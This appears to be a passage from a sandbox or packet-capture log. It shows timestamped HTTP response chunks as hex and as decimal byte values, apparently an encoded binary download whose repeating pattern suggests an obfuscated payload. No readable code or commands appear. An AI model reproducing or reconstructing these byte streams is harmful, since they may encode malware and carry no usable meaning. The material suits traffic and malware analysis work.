                                                                                              2021-09-27 18:27:44 UTC1800INData Raw: 35 30 20 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 31 30 35 20 37 32 20 33 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 38 20 36 33 20 37 38 20 36 37 20 35 34 20 38 34 20 31 31 38 20 32 36 20 31 36 34 20 31 31 32 20 35 30 20 35 38 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 38 35 20 35 30 20 34 38 20 35 36 20 37 32 20 33 37 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 32 35 31 20 34 38 20 35 30 20 36 30 20 34 32 20 33 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 34 39 20 35 30 20 35 34 20 39 34 20 39 30 20 32 31 33 20 31 30 38 20 31 31 32 20 35 36 20 33 33 20 36 33 20 31 38 36 20 31 30 36 20 31 31 34 20 31 31 37 20 31 30 38 20 33 31 20 31 30 35 20 34 38 20 35 30 20 36 30 20 31 32 37 20 31 30
                                                                                              Data Ascii: 50 54 85 29 46 109 112 56 27 105 72 33 114 117 105 98 63 78 67 54 84 118 26 164 112 50 58 76 71 84 114 113 2 185 50 48 56 72 37 114 117 105 31 251 48 50 60 42 3 117 109 116 93 249 50 54 94 90 213 108 112 56 33 63 186 106 114 117 108 31 105 48 50 60 127 10
                                                                                              2021-09-27 18:27:44 UTC1804INData Raw: 31 31 33 20 35 30 20 35 34 20 37 35 20 31 33 38 20 38 34 20 31 31 34 20 31 31 36 20 32 38 20 32 30 34 20 35 30 20 34 38 20 35 31 20 32 38 20 37 31 20 36 36 20 31 31 39 20 31 30 39 20 38 30 20 35 30 20 34 38 20 35 30 20 36 31 20 38 34 20 31 31 34 20 31 30 30 20 37 37 20 32 33 36 20 33 31 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 32 20 31 39 30 20 31 36 20 35 30 20 35 34 20 38 35 20 39 30 20 33 38 20 31 30 38 20 31 31 32 20 35 32 20 37 33 20 31 38 20 35 34 20 38 34 20 31 31 35 20 34 20 37 37 20 31 31 32 20 35 30 20 34 39 20 32 34 20 33 37 20 31 30 30 20 31 31 32 20 31 31 37 20 37 37 20 31 31 32 20 35 30 20 34 38 20 35 37 20 35 34 20 38 34 20 39 39 20 38 35 20 32 32 30 20 39 33 20 32 32 36 20 34 36 20 32 36 20 32
                                                                                              Data Ascii: 113 50 54 75 138 84 114 116 28 204 50 48 51 28 71 66 119 109 80 50 48 50 61 84 114 100 77 236 31 224 44 30 171 114 117 107 102 190 16 50 54 85 90 38 108 112 52 73 18 54 84 115 4 77 112 50 49 24 37 100 112 117 77 112 50 48 57 54 84 99 85 220 93 226 46 26 2
                                                                                              2021-09-27 18:27:44 UTC1808INData Raw: 20 31 31 37 20 31 30 39 20 31 31 33 20 32 34 20 33 35 20 32 20 35 30 20 38 34 20 37 31 20 31 31 37 20 31 30 39 20 31 31 32 20 31 38 33 20 34 38 20 35 30 20 33 39 20 34 32 20 36 34 20 31 31 37 20 31 30 39 20 31 31 36 20 34 38 20 34 31 20 34 33 20 32 37 20 39 34 20 38 34 20 32 36 20 32 32 35 20 31 31 32 20 35 30 20 35 38 20 33 30 20 34 37 20 31 32 37 20 31 31 33 20 38 33 20 37 30 20 31 33 32 20 37 36 20 32 20 35 30 20 35 34 20 38 30 20 31 31 32 20 39 39 20 31 32 33 20 39 32 20 35 33 20 32 32 20 39 33 20 31 38 37 20 38 34 20 31 31 34 20 31 32 37 20 37 31 20 38 36 20 32 35 20 31 39 39 20 34 39 20 34 34 20 37 32 20 39 35 20 31 31 39 20 37 35 20 39 30 20 32 30 20 32 37 20 32 30 36 20 35 34 20 38 34 20 31 31 34 20 31 31 38 20 39 33 20 31 32 32 20 35 30 20 36 33
                                                                                              Data Ascii: 117 109 113 24 35 2 50 84 71 117 109 112 183 48 50 39 42 64 117 109 116 48 41 43 27 94 84 26 225 112 50 58 30 47 127 113 83 70 132 76 2 50 54 80 112 99 123 92 53 22 93 187 84 114 127 71 86 25 199 49 44 72 95 119 75 90 20 27 206 54 84 114 118 93 122 50 63
                                                                                              2021-09-27 18:27:44 UTC1812INData Raw: 20 31 30 36 20 31 38 37 20 31 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 34 20 33 31 20 33 36 20 32 30 20 36 39 20 31 34 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 30 36 20 33 31 20 36 32 20 32 30 20 35 32 20 36 36 20 32 34 20 32 36 20 35 39 20 31 31 33 20 35 30 20 35 38 20 32 35 20 34 38 20 39 34 20 38 39 20 31 35 39 20 31 30 32 20 39 31 20 31 39 34 20 35 34 20 31 38 38 20 31 32 39 20 36 32 20 31 31 38 20 31 32 34 20 35 32 20 38 38 20 36 39 20 34 38 20 35 30 20 36 30 20 36 31 20 31 30 35 20 38 38 20 37 34 20 38 36 20 34 38 20 35 34 20 33 36 20 33 39 20 38 31 20 32 39 20 34 31 20 31 30 38 20 31 31 32 20 35 36 20 33 35 20 35 34 20 34 39 20 38 32 20 31 30 30 20 31 30 30 20 31 30 35 20 31 30 30 20 33 36 20 39 35 20 32 34 38 20 35 35 20 38 34 20 31
                                                                                              Data Ascii: 106 187 118 114 117 108 104 31 36 20 69 147 115 117 103 106 31 62 20 52 66 24 26 59 113 50 58 25 48 94 89 159 102 91 194 54 188 129 62 118 124 52 88 69 48 50 60 61 105 88 74 86 48 54 36 39 81 29 41 108 112 56 35 54 49 82 100 100 105 100 36 95 248 55 84 1
                                                                                              2021-09-27 18:27:44 UTC1816INData Raw: 20 31 31 32 20 31 34 20 32 34 36 20 31 31 32 20 35 30 20 35 32 20 34 39 20 33 30 20 32 30 39 20 31 31 34 20 31 31 37 20 31 30 33 20 34 20 31 31 35 20 34 38 20 35 30 20 35 32 20 37 39 20 39 35 20 31 31 38 20 37 35 20 38 36 20 32 34 20 37 37 20 31 36 39 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 34 39 20 31 31 32 20 34 39 20 30 20 35 39 20 35 34 20 37 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 38 36 20 39 20 32 33 38 20 31 30 39 20 31 31 32 20 35 34 20 35 31 20 32 36 20 31 37 36 20 38 34 20 31 31 34 20 31 32 37 20 32 35 20 34 39 20 35 30 20 34 38 20 34 38 20 34 37 20 31 32 31 20 31 31 33 20 38 33 20 37 35 20 39 30 20 37 39 20 31 37 31 20 35 30 20 35 34 20 38 30 20 38 39 20 31 34 31 20 31 30 39 20 39 39 20 32
                                                                                              Data Ascii: 112 14 246 112 50 52 49 30 209 114 117 103 4 115 48 50 52 79 95 118 75 86 24 77 169 54 84 118 94 149 112 49 0 59 54 75 114 117 109 112 50 48 50 52 86 9 238 109 112 54 51 26 176 84 114 127 25 49 50 48 48 47 121 113 83 75 90 79 171 50 54 80 89 141 109 99 2
                                                                                              2021-09-27 18:27:44 UTC1819INData Raw: 31 37 20 39 38 20 31 31 32 20 35 30 20 34 38 20 31 36 30 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 32 32 20 31 30 36 20 33 31 20 35 35 20 32 30 20 37 37 20 32 34 38 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 32 37 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 34 31 20 32 39 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 31 39 33 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 31 31 33 20 36 39 20 31 30 34 20 31 31 32 20 36 32 20 34 39 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 30 20 31 38 39 20 31 36 20 35 34 20 38 34 20 31 31 35 20 31 31 31 20 38 37 20 31 34 35
                                                                                              Data Ascii: 17 98 112 50 48 160 54 84 99 119 122 106 31 55 20 77 248 114 117 105 90 20 27 197 54 87 66 124 109 127 50 48 50 54 84 114 117 111 115 41 29 49 16 114 88 8 193 112 50 52 25 206 84 113 69 104 112 62 49 50 54 84 114 117 109 114 40 189 16 54 84 115 111 87 145
                                                                                              2021-09-27 18:27:44 UTC1824INData Raw: 39 20 33 31 20 35 34 20 32 30 20 32 39 20 31 31 39 20 31 32 31 20 39 34 20 31 35 34 20 31 32 32 20 32 35 20 32 30 30 20 34 38 20 37 37 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 35 20 39 33 20 35 31 20 32 36 20 34 35 20 33 34 20 31 32 34 20 31 37 32 20 31 31 37 20 31 30 39 20 31 32 32 20 35 32 20 34 37 20 33 38 20 31 31 30 20 36 37 20 39 35 20 31 31 38 20 37 35 20 39 31 20 34 39 20 35 38 20 32 35 20 35 34 20 38 32 20 31 31 37 20 36 38 20 31 37 38 20 31 31 34 20 37 33 20 31 35 32 20 35 30 20 35 34 20 38 30 20 39 34 20 31 31 35 20 31 31 31 20 33 31 20 31 34 35 20 34 39 20 35 30 20 34 38 20 31 32 36 20 31 31 34 20 31 31 37 20 31 31 38 20 36 34 20 35 34 20 34 38 20 31 36 33 20 35 34 20 38 34 20 31 31 34 20 32 33 37 20 31 30 39 20 31 31 32 20 33 35 20 35 30
                                                                                              Data Ascii: 9 31 54 20 29 119 121 94 154 122 25 200 48 77 252 114 117 105 93 51 26 45 34 124 172 117 109 122 52 47 38 110 67 95 118 75 91 49 58 25 54 82 117 68 178 114 73 152 50 54 80 94 115 111 31 145 49 50 48 126 114 117 118 64 54 48 163 54 84 114 237 109 112 35 50
                                                                                              2021-09-27 18:27:44 UTC1828INData Raw: 31 20 35 31 20 34 38 20 35 36 20 35 38 20 39 32 20 31 31 32 20 31 34 20 32 34 33 20 31 31 32 20 35 30 20 35 32 20 33 20 32 38 20 38 36 20 39 20 32 33 38 20 31 30 39 20 31 31 32 20 35 34 20 33 35 20 35 34 20 33 39 20 38 30 20 39 34 20 39 38 20 31 32 34 20 31 31 36 20 34 38 20 31 36 20 36 32 20 36 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 36 35 20 36 36 20 38 34 20 31 31 34 20 31 32 37 20 32 20 31 38 38 20 35 31 20 34 38 20 35 32 20 35 32 20 35 39 20 32 30 39 20 31 31 36 20 31 30 39 20 31 31 38 20 32 34 20 35 36 20 33 36 20 36 20 31 32 36 20 31 31 32 20 31 34 20 32 34 36 20 31 31 32 20 35 30 20 35 32 20 33 33 20 35 30 20 36 39 20 31 31 38 20 38 39 20 31 32 32 20 39 37 20 35 34 20 35 30 20 31 38 20 32 32 35 20 31 30 31 20
                                                                                              Data Ascii: 1 51 48 56 58 92 112 14 243 112 50 52 3 28 86 9 238 109 112 54 35 54 39 80 94 98 124 116 48 16 62 6 132 108 93 146 112 50 54 65 66 84 114 127 2 188 51 48 52 52 59 209 116 109 118 24 56 36 6 126 112 14 246 112 50 52 33 50 69 118 89 122 97 54 50 18 225 101
                                                                                              2021-09-27 18:27:44 UTC1832INData Raw: 32 20 35 30 20 34 39 20 33 39 20 32 37 20 37 35 20 38 34 20 31 32 34 20 31 32 33 20 31 31 35 20 39 33 20 36 20 35 30 20 35 34 20 39 34 20 31 30 30 20 39 33 20 31 35 38 20 31 31 33 20 35 30 20 35 38 20 31 37 32 20 36 33 20 37 36 20 39 35 20 31 32 33 20 37 35 20 38 36 20 35 33 20 32 36 20 37 39 20 31 33 36 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 36 36 20 36 33 20 32 37 20 32 33 37 20 37 35 20 32 33 35 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 32 33 20 34 38 20 35 30 20 35 34 20 37 31 20 36 36 20 31 31 39 20 31 30 39 20 36 34 20 35 30 20 34 38 20 35 30 20 31 35 30 20 38 34 20 31 31 34 20 31 30 30 20 39 38 20 31 31 33 20 37 33 20 32 34 32 20 35 30 20 35 34 20 38 30 20 31 30 31 20 39 31 20 31 30 37 20 31 34 20 32 32 36 20 34 39 20 35 30 20 36
                                                                                              Data Ascii: 2 50 49 39 27 75 84 124 123 115 93 6 50 54 94 100 93 158 113 50 58 172 63 76 95 123 75 86 53 26 79 136 84 114 113 70 166 63 27 237 75 235 114 117 105 91 223 48 50 54 71 66 119 109 64 50 48 50 150 84 114 100 98 113 73 242 50 54 80 101 91 107 14 226 49 50 6
                                                                                              2021-09-27 18:27:44 UTC1836INData Raw: 20 32 31 33 20 36 35 20 39 39 20 36 32 20 33 38 20 34 36 20 31 33 32 20 37 36 20 31 37 34 20 31 32 35 20 31 33 34 20 31 37 34 20 32 33 30 20 31 39 31 20 31 39 36 20 31 33 35 20 32 32 31 20 33 31 20 39 33 20 33 30 20 31 32 31 20 35 36 20 31 38 30 20 31 35 30 20 32 30 32 20 36 38 20 38 30 20 31 36 34 20 31 33 20 31 30 30 20 32 35 34 20 32 34 39 20 32 30 32 20 32 31 32 20 31 33 37 20 31 32 35 20 31 34 33 20 31 34 35 20 31 34 30 20 31 32 20 31 37 34 20 39 35 20 32 30 34 20 31 30 33 20 33 20 31 31 33 20 32 31 38 20 31 32 31 20 32 33 35 20 32 30 39 20 36 36 20 32 34 38 20 33 31 20 31 36 32 20 32 35 33 20 31 37 39 20 32 31 30 20 31 33 30 20 38 33 20 31 38 30 20 37 32 20 33 33 20 32 34 34 20 31 36 32 20 34 32 20 37 31 20 31 32 36 20 32 33 35 20 31 31 34 20 31 32
                                                                                              Data Ascii: 213 65 99 62 38 46 132 76 174 125 134 174 230 191 196 135 221 31 93 30 121 56 180 150 202 68 80 164 13 100 254 249 202 212 137 125 143 145 140 12 174 95 204 103 3 113 218 121 235 209 66 248 31 162 253 179 210 130 83 180 72 33 244 162 42 71 126 235 114 12
                                                                                              2021-09-27 18:27:44 UTC1840INData Raw: 36 32 20 31 31 31 20 31 31 36 20 38 34 20 39 34 20 36 34 20 33 31 20 32 30 35 20 32 31 34 20 31 31 36 20 31 39 33 20 31 30 32 20 37 35 20 32 35 33 20 32 30 33 20 38 33 20 34 33 20 31 31 37 20 32 30 38 20 34 37 20 32 33 39 20 31 37 35 20 32 32 36 20 31 36 20 31 32 20 33 39 20 37 39 20 32 30 32 20 35 37 20 31 31 33 20 31 32 33 20 31 34 31 20 31 34 39 20 38 34 20 31 36 37 20 31 38 20 31 37 37 20 32 34 35 20 32 35 30 20 35 39 20 31 34 37 20 39 36 20 39 35 20 32 32 37 20 36 20 37 32 20 32 30 20 31 31 39 20 31 30 31 20 31 32 31 20 31 33 37 20 32 34 37 20 34 20 32 34 32 20 31 32 30 20 36 31 20 31 39 32 20 34 37 20 31 30 35 20 32 32 33 20 31 34 31 20 32 32 34 20 31 37 20 31 31 33 20 32 32 32 20 31 35 37 20 36 35 20 34 30 20 32 30 32 20 36 34 20 32 34 32 20 36 33
                                                                                              Data Ascii: 62 111 116 84 94 64 31 205 214 116 193 102 75 253 203 83 43 117 208 47 239 175 226 16 12 39 79 202 57 113 123 141 149 84 167 18 177 245 250 59 147 96 95 227 6 72 20 119 101 121 137 247 4 242 120 61 192 47 105 223 141 224 17 113 222 157 65 40 202 64 242 63
                                                                                              2021-09-27 18:27:44 UTC1844INData Raw: 32 31 36 20 31 35 32 20 32 38 20 31 31 30 20 32 35 31 20 33 36 20 31 36 32 20 31 38 36 20 32 31 39 20 31 34 39 20 31 35 30 20 32 35 34 20 31 30 35 20 32 32 35 20 32 33 38 20 32 31 20 33 35 20 31 34 31 20 35 31 20 32 31 30 20 32 31 31 20 32 32 32 20 35 38 20 32 31 35 20 32 32 35 20 31 31 20 31 37 31 20 37 36 20 31 34 20 31 31 35 20 31 38 31 20 39 32 20 35 35 20 31 33 37 20 31 30 30 20 31 33 39 20 32 34 37 20 31 30 34 20 32 34 34 20 35 33 20 31 35 38 20 31 39 39 20 31 30 39 20 32 33 32 20 31 39 31 20 31 30 35 20 31 34 34 20 37 37 20 32 36 20 32 30 38 20 31 31 33 20 32 32 31 20 31 32 38 20 31 37 31 20 32 31 34 20 32 33 31 20 31 34 20 32 34 37 20 32 30 20 31 31 36 20 31 33 37 20 32 34 37 20 31 39 34 20 31 35 38 20 34 32 20 31 33 35 20 31 35 33 20 34 33 20 32
                                                                                              Data Ascii: 216 152 28 110 251 36 162 186 219 149 150 254 105 225 238 21 35 141 51 210 211 222 58 215 225 11 171 76 14 115 181 92 55 137 100 139 247 104 244 53 158 199 109 232 191 105 144 77 26 208 113 221 128 171 214 231 14 247 20 116 137 247 194 158 42 135 153 43 2
                                                                                              2021-09-27 18:27:44 UTC1848INData Raw: 31 39 34 20 33 37 20 31 39 32 20 31 39 30 20 32 34 20 34 38 20 32 30 32 20 32 30 36 20 39 36 20 31 33 20 31 30 39 20 31 37 34 20 31 34 39 20 34 36 20 31 36 20 31 33 33 20 31 38 20 33 39 20 32 33 38 20 37 38 20 38 20 37 35 20 34 39 20 35 20 32 31 20 32 30 33 20 32 33 30 20 32 30 32 20 36 32 20 31 38 37 20 31 39 32 20 36 38 20 31 38 35 20 36 20 36 34 20 36 33 20 31 33 32 20 31 30 39 20 31 34 31 20 31 34 39 20 32 33 32 20 32 31 34 20 32 31 38 20 32 33 32 20 34 39 20 31 32 33 20 31 33 37 20 31 31 31 20 31 33 37 20 32 34 37 20 31 39 33 20 32 35 35 20 31 38 34 20 32 31 36 20 31 38 33 20 33 31 20 31 31 33 20 32 33 38 20 31 33 32 20 33 34 20 31 32 35 20 37 37 20 32 34 31 20 32 35 30 20 31 33 38 20 32 31 30 20 31 39 33 20 31 32 34 20 33 32 20 39 37 20 37 33 20 31
                                                                                              Data Ascii: 194 37 192 190 24 48 202 206 96 13 109 174 149 46 16 133 18 39 238 78 8 75 49 5 21 203 230 202 62 187 192 68 185 6 64 63 132 109 141 149 232 214 218 232 49 123 137 111 137 247 193 255 184 216 183 31 113 238 132 34 125 77 241 250 138 210 193 124 32 97 73 1
                                                                                              2021-09-27 18:27:44 UTC1851INData Raw: 34 20 31 36 39 20 31 31 33 20 35 32 20 31 31 32 20 35 32 20 34 38 20 32 31 34 20 35 30 20 31 36 39 20 31 31 38 20 31 31 35 20 31 30 39 20 39 36 20 35 35 20 32 30 35 20 35 34 20 34 38 20 38 34 20 39 30 20 31 31 32 20 31 34 34 20 31 31 36 20 33 32 20 34 38 20 31 31 39 20 35 31 20 31 36 39 20 31 31 38 20 31 30 33 20 31 30 39 20 36 31 20 35 35 20 32 30 35 20 35 34 20 33 36 20 38 34 20 34 34 20 31 31 32 20 31 34 34 20 31 31 36 20 35 32 20 34 38 20 36 37 20 35 31 20 31 36 39 20 31 31 38 20 31 31 35 20 31 30 39 20 31 32 20 35 35 20 32 30 35 20 35 34 20 34 38 20 38 34 20 32 34 35 20 31 31 32 20 35 32 20 31 31 32 20 34 30 20 34 38 20 31 38 38 20 35 31 20 35 37 20 31 31 34 20 31 31 31 20 31 30 39 20 32 33 32 20 35 35 20 39 33 20 35 30 20 34 38 20 38 34 20 32 33 39
                                                                                              Data Ascii: 4 169 113 52 112 52 48 214 50 169 118 115 109 96 55 205 54 48 84 90 112 144 116 32 48 119 51 169 118 103 109 61 55 205 54 36 84 44 112 144 116 52 48 67 51 169 118 115 109 12 55 205 54 48 84 245 112 52 112 40 48 188 51 57 114 111 109 232 55 93 50 48 84 239
                                                                                              2021-09-27 18:27:44 UTC1856INData Raw: 20 31 39 38 20 31 30 30 20 31 30 39 20 31 31 32 20 32 35 31 20 34 39 20 32 34 20 35 34 20 39 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 35 30 20 32 32 34 20 33 35 20 35 34 20 38 34 20 31 38 37 20 31 31 36 20 33 34 20 31 31 32 20 32 34 36 20 34 38 20 35 36 20 35 35 20 38 34 20 31 31 34 20 31 35 33 20 31 32 34 20 31 31 32 20 35 30 20 35 37 20 34 39 20 31 32 31 20 38 34 20 31 36 34 20 31 31 37 20 31 30 39 20 31 31 33 20 35 30 20 34 38 20 35 38 20 33 36 20 38 34 20 31 31 34 20 31 38 38 20 31 30 38 20 33 37 20 35 30 20 32 33 30 20 35 30 20 31 38 32 20 38 35 20 39 38 20 31 31 37 20 38 35 20 39 38 20 35 30 20 34 38 20 32 35 31 20 35 35 20 31 20 31 31 34 20 31 35 30 20 31 30 39 20 31 31 35 20 35 31 20 33 32 20 35 30 20 39 34 20 37 30 20 31 31 34 20 31 31
                                                                                              Data Ascii: 198 100 109 112 251 49 24 54 9 114 117 108 112 50 224 35 54 84 187 116 34 112 246 48 56 55 84 114 153 124 112 50 57 49 121 84 164 117 109 113 50 48 58 36 84 114 188 108 37 50 230 50 182 85 98 117 85 98 50 48 251 55 1 114 150 109 115 51 32 50 94 70 114 11
                                                                                              2021-09-27 18:27:44 UTC1860INData Raw: 20 39 32 20 31 33 20 31 35 33 20 34 39 20 34 39 20 35 30 20 32 32 37 20 35 35 20 32 34 35 20 31 31 36 20 31 30 38 20 31 31 32 20 35 35 20 38 34 20 31 38 31 20 35 35 20 38 32 20 31 31 34 20 31 37 36 20 39 20 31 38 33 20 35 30 20 33 33 20 35 30 20 36 37 20 34 39 20 31 30 32 20 31 31 33 20 31 32 34 20 31 31 32 20 31 35 31 20 38 35 20 34 33 20 35 30 20 36 39 20 31 31 34 20 31 36 30 20 38 20 31 32 37 20 35 31 20 33 33 20 35 30 20 35 31 20 35 30 20 31 30 38 20 31 31 33 20 31 32 34 20 31 31 32 20 37 20 38 36 20 31 38 31 20 35 35 20 36 39 20 31 31 34 20 31 36 20 31 31 20 31 32 37 20 35 31 20 33 33 20 35 30 20 31 36 33 20 35 30 20 32 34 35 20 31 31 36 20 31 32 34 20 31 31 32 20 32 34 37 20 38 36 20 31 38 31 20 35 35 20 36 39 20 31 31 34 20 31 32 38 20 31 31 20 38
                                                                                              Data Ascii: 92 13 153 49 49 50 227 55 245 116 108 112 55 84 181 55 82 114 176 9 183 50 33 50 67 49 102 113 124 112 151 85 43 50 69 114 160 8 127 51 33 50 51 50 108 113 124 112 7 86 181 55 69 114 16 11 127 51 33 50 163 50 245 116 124 112 247 86 181 55 69 114 128 11 8
                                                                                              2021-09-27 18:27:44 UTC1864INData Raw: 32 30 30 20 31 31 37 20 39 39 20 31 31 32 20 39 34 20 32 36 20 35 30 20 35 34 20 38 34 20 31 31 34 20 39 39 20 31 30 39 20 31 35 33 20 34 35 20 31 31 36 20 35 30 20 35 37 20 38 34 20 32 34 36 20 39 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 32 20 34 36 20 31 36 37 20 31 30 34 20 31 38 20 31 30 39 20 31 32 37 20 35 30 20 31 34 34 20 32 34 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 32 20 39 35 20 31 36 20 32 34 39 20 35 34 20 39 31 20 31 31 34 20 31 37 33 20 37 31 20 31 31 32 20 35 30 20 34 38 20 35 30 20 31 36 30 20 38 34 20 31 37 35 20 38 35 20 31 38 34 20 31 31 32 20 33 32 20 34 38 20 39 34 20 32 39 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 38 20 34 32 20 31 39 35 20 34 30 20 32 33 32 20 38 34 20 31 30 32 20 31 31
                                                                                              Data Ascii: 200 117 99 112 94 26 50 54 84 114 99 109 153 45 116 50 57 84 246 95 109 112 50 48 52 46 167 104 18 109 127 50 144 24 54 84 114 117 107 112 95 16 249 54 91 114 173 71 112 50 48 50 160 84 175 85 184 112 32 48 94 29 84 114 117 109 118 42 195 40 232 84 102 11
                                                                                              2021-09-27 18:27:44 UTC1868INData Raw: 34 20 32 32 30 20 35 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 33 33 20 35 30 20 31 34 37 20 31 30 34 20 35 34 20 31 31 37 20 35 35 20 31 31 32 20 31 37 30 20 31 32 31 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 31 35 33 20 31 34 20 31 31 36 20 35 30 20 31 30 38 20 38 34 20 31 36 36 20 36 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 31 32 31 20 37 39 20 34 39 20 31 30 39 20 34 32 20 35 30 20 32 34 20 31 32 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 32 20 36 37 20 31 33 20 31 31 38 20 35 34 20 31 34 20 31 31 34 20 34 35 20 33 38 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 39 20 38 34 20 31 39 39 20 37 32 20 38 31 20 31 31 34 20 31 30 34 20 34 38 20 31 35 34 20 31 32 35 20 38 34 20
                                                                                              Data Ascii: 4 220 59 117 109 112 50 33 50 147 104 54 117 55 112 170 121 50 54 84 114 100 109 153 14 116 50 108 84 166 63 109 112 50 48 35 54 121 79 49 109 42 50 24 121 54 84 114 117 124 112 67 13 118 54 14 114 45 38 112 50 48 50 39 84 199 72 81 114 104 48 154 125 84
                                                                                              2021-09-27 18:27:44 UTC1872INData Raw: 35 34 20 38 34 20 31 31 34 20 31 31 37 20 32 33 37 20 31 31 32 20 33 36 20 31 36 20 31 31 20 31 31 30 20 32 30 36 20 31 31 33 20 31 36 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 31 38 32 20 38 34 20 31 30 30 20 38 35 20 32 32 34 20 34 30 20 31 34 36 20 35 31 20 32 32 34 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 32 34 30 20 35 30 20 33 38 20 31 38 20 32 31 35 20 31 32 20 32 31 32 20 31 31 38 20 31 38 35 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 32 31 32 20 31 31 34 20 39 39 20 37 37 20 31 30 35 20 31 30 37 20 31 32 20 34 38 20 32 32 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 31 37 38 20 34 38 20 33 36 20 32 32 20 39 37 20 34 33 20 32 32 39 20 31 31 31 20 31 36 35 20 35 30 20 31 32 30 20 39 34 20 35
                                                                                              Data Ascii: 54 84 114 117 237 112 36 16 11 110 206 113 165 109 112 50 48 50 182 84 100 85 224 40 146 51 224 54 84 114 117 109 240 50 38 18 215 12 212 118 185 112 50 48 50 54 212 114 99 77 105 107 12 48 227 84 114 117 109 112 178 48 36 22 97 43 229 111 165 50 120 94 5
                                                                                              2021-09-27 18:27:44 UTC1876INData Raw: 35 33 20 32 35 33 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 39 20 37 36 20 31 32 32 20 31 31 31 20 34 31 20 31 31 32 20 32 33 20 34 39 20 31 33 30 20 31 36 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 36 39 20 36 35 20 32 35 30 20 38 30 20 38 37 20 31 31 36 20 31 30 35 20 32 32 37 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 31 34 34 20 33 30 20 31 36 32 20 35 34 20 32 32 20 35 31 20 32 36 20 31 39 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 36 20 34 38 20 34 37 20 36 36 20 31 34 31 20 31 31 38 20 38 32 20 31 30 38 20 33 32 20 31 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 34 20 34 20 32 31 30 20 35 32 20 32 36 20 35 35 20 31 35 32 20 32 33 34 20 31 31 37 20 31 30 39 20
                                                                                              Data Ascii: 53 253 112 50 48 50 39 76 122 111 41 112 23 49 130 164 84 114 117 109 102 50 169 65 250 80 87 116 105 227 50 48 50 54 66 114 144 30 162 54 22 51 26 199 114 117 109 112 36 48 47 66 141 118 82 108 32 161 48 50 54 84 100 117 4 4 210 52 26 55 152 234 117 109
                                                                                              2021-09-27 18:27:44 UTC1880INData Raw: 34 20 31 31 35 20 31 30 39 20 31 36 38 20 31 36 32 20 31 37 32 20 35 30 20 31 30 39 20 38 35 20 31 38 36 20 31 39 36 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 32 20 35 34 20 39 32 20 32 32 37 20 32 33 37 20 31 30 38 20 34 33 20 35 31 20 32 30 30 20 31 33 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 32 20 31 30 32 20 31 36 31 20 31 31 20 35 35 20 38 20 31 31 35 20 39 37 20 32 32 33 20 31 31 32 20 35 30 20 34 38 20 35 30 20 34 38 20 38 34 20 32 34 36 20 32 32 38 20 36 34 20 31 31 33 20 31 31 30 20 34 39 20 32 20 31 33 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 38 20 35 30 20 32 32 34 20 31 36 33 20 31 37 30 20 38 34 20 34 37 20 31 31 36 20 33 33 20 31 39 34 20 35 30 20 34 38 20 35 30 20 35 34 20 38 32 20 31 31 34 20
                                                                                              Data Ascii: 4 115 109 168 162 172 50 109 85 186 196 109 112 50 48 52 54 92 227 237 108 43 51 200 131 54 84 114 117 107 112 102 161 11 55 8 115 97 223 112 50 48 50 48 84 246 228 64 113 110 49 2 132 84 114 117 109 118 50 224 163 170 84 47 116 33 194 50 48 50 54 82 114
